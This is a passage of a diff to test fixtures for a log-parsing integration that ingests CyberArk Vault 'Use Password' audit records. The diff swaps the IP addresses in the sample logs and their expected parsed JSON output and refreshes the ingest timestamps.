Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"fun and profit","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.13","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:46:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:49\n 2021-03-11T17:46:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 127.0.0.1\n \n \n \n FOR FUN.\n \n Use Password\n 67.43.156.13\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:49","IsoTimestamp":"2021-03-11T17:46:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"FOR FUN.","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.13","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:48:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:27\n 2021-03-11T17:48:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 10.0.2.2\n \n \n \n For fun and profit\n \n Use Password\n 67.43.156.13\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:27","IsoTimestamp":"2021-03-11T17:48:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"For fun and profit","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.13","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:54:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:54:49\n 2021-03-11T17:54:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 10.0.2.2\n \n \n \n Because I say so\n \n Use Password\n 67.43.156.13\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:54:49","IsoTimestamp":"2021-03-11T17:54:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"Because I say so","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.13","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:56:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:30\n 2021-03-11T17:56:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 10.0.2.2\n \n \n \n for fun\n \n Use Password\n 67.43.156.13\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:30","IsoTimestamp":"2021-03-11T17:56:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"for fun","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.13","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T20:23:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:17\n 2021-03-11T20:23:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 10.0.2.2\n \n \n \n testing\n \n Use Password\n 67.43.156.13\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:17","IsoTimestamp":"2021-03-11T20:23:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"testing","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.13","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-14T13:49:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:35\n 2021-03-14T13:49:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.13\n \n \n \n \n \n Use Password\n 67.43.156.15\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:35","IsoTimestamp":"2021-03-14T13:49:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.15","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:31:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:31:54\n 2021-03-15T10:31:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.13\n \n \n \n \n \n Use Password\n 67.43.156.15\n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:31:54","IsoTimestamp":"2021-03-15T10:31:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.15","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:08:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:26\n 2021-03-15T14:08:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.13\n \n \n \n \n \n Use Password\n 67.43.156.15\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:26","IsoTimestamp":"2021-03-15T14:08:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.15","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-16T10:04:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 03:04:49\n 2021-03-16T10:04:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.13\n \n \n \n \n \n Use Password\n 67.43.156.15\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 03:04:49","IsoTimestamp":"2021-03-16T10:04:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.15","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-308-use-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-308-use-password.log-expected.json index 53efc258bab..7960201337d 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-308-use-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-308-use-password.log-expected.json @@ -75,7 +75,7 @@ "event": { "severity": 2, "reason": "(Action: Connect)", - "ingested": "2021-06-09T10:24:32.348976500Z", + "ingested": "2021-12-09T13:36:52.374483400Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eadm2\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eWindows\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.6\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Connect)\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.2.0.3\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WIN-SERVER-LOCAL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"Administrator2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"dbserver.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"DBServer\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessReconciliation\\\" Value=\\\"1604944215\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"EvilCorp\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"308\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"adm2\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Windows\",\"File\":\"Root\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\",\"Station\":\"10.2.0.6\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Connect)\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"10.2.0.3\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WIN-SERVER-LOCAL\"},{\"Name\":\"UserName\",\"Value\":\"Administrator2\"},{\"Name\":\"Address\",\"Value\":\"dbserver.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"LogonDomain\",\"Value\":\"DBServer\"},{\"Name\":\"SequenceID\",\"Value\":\"1\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessReconciliation\",\"Value\":\"1604944215\"},{\"Name\":\"Customer\",\"Value\":\"EvilCorp\"}]}}}}", "code": "308", "kind": "event", @@ -100,20 +100,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -136,7 +127,7 @@ }, "@timestamp": "2021-03-11T17:38:12.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -148,8 +139,8 @@ ], "ip": [ "127.0.0.1", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { @@ -157,20 +148,20 @@ "severity": "Info", "reason": "fun and profit", "iso_timestamp": "2021-03-11T17:38:12Z", - "gateway_station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:12\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:12Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003efun and profit\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:12\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:12Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003efun and profit\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Use Password", "issuer": "Administrator", "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", "station": "127.0.0.1", "action": "Use Password", @@ -184,8 +175,8 @@ "event": { "severity": 2, "reason": "fun and profit", - "ingested": "2021-06-09T10:24:32.348991100Z", - "original": "\u003c5\u003e1 2021-03-11T17:38:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:12\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:12Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003efun and profit\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:12\",\"IsoTimestamp\":\"2021-03-11T17:38:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"fun and profit\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"81.32.170.205\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:52.374492200Z", + "original": "\u003c5\u003e1 2021-03-11T17:38:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:12\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:12Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse 